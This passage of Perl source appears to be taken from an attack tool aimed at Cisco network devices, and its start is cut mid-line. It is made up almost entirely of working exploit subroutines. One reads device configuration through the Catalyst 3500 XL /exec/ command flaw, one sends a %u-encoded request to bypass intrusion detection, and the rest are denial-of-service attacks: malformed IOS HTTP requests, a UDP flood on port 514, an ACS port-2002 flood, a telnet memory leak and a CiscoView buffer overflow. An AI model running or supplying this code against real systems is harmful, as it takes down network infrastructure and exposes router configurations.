http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; close($sockd); exit(1); } sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability { my $serv = $host; my $port = 80; my $k = ""; print "Enter a file to read [ /show/config/cr set as default ] : "; $k = <STDIN>; chomp ($k); if ($k eq "") {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";} else {$vuln = "GET /exec$k HTTP/1.0\n\n";} my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); } sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET /error?/ HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); } sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability { my $ip = $host; my $port = "514"; my $ports = ""; my $size = ""; my $i = ""; my $string = "%%%%%XX%%%%%"; print "Input packets size : "; $size = <STDIN>; chomp($size); socket(SS, PF_INET, SOCK_DGRAM, 17); my $iaddr = inet_aton("$ip"); for ($i=0; $i<10000; $i++) { send(SS, $string, $size, sockaddr_in($port, $iaddr)); } printf "\nPackets sent ...\n"; sleep(2); printf "Please enter a server's open port : "; $ports = <STDIN>; chomp $ports; printf "\nNow checking server status ...\n"; sleep(2); socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; my $dest = sockaddr_in ($ports, inet_aton($ip)); connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n"; printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; exit(1); } sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability { my $ip = $host; my $vln = "%%%%%XX%%%%%"; my $num = 30000; my $string .= $vln x $num; my $shc="\015\012"; my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ip, PeerPort => "(2002)", ) || die "Unable to connect to $ip:2002 ...\n\n"; $sockd->autoflush(1); print $sockd "$string" . $shc; while (<$sockd>){ print } print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$ip, PeerPort=>"(2002)",); unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); } sub cisco11 # Cisco Catalyst Memory Leak Vulnerability { my $serv = $host; my $rep = ""; my $str = "AAA\n"; print "\nInput the number of repetitions : "; $rep = <STDIN>; chomp $rep; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(23)", Proto => "tcp") || die "No telnet server detected on $serv ...\n\n"; for ($k=0; $k<=$rep; $k++) { print $sockd "$str"; sleep(1); print $sockd "$str"; sleep(1); } close($sockd); print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"(23)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n"; close($sockd2); exit(1); } sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability { my $serv = $host; my $l =100; my $vuln = ""; my $long = "A" x $l; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(80)", Proto => "tcp") || die "No http server detected on $serv ...\n\n"; for ($k=0; $k<=50; $k++) { my $vuln = "GET " . $long . " HTTP/1.0\n\n"; print $sockd "$vuln\n\n"; sleep(1); $l = $l + 100; } close($sockd); print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n"; close($sockd2); exit(1); } sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF) { my $serv = $host; my $vuln = "GET %u002F HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(80)", Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; close($sockd); sleep(1); print("Now checking server's status ...\n"); print("Please verify if directory has been listed ...\n\n"); print("Server response :\n"); sleep(2); while (<$sockd>){ print } exit(1); } sub cisco14 # Cisco IOS HTTP server DoS Vulnerability { my $serv = $host; my $vuln = "GET /TEST?/ HTTP/1.0"; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; print $sockd "$vuln\n\n"; print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); }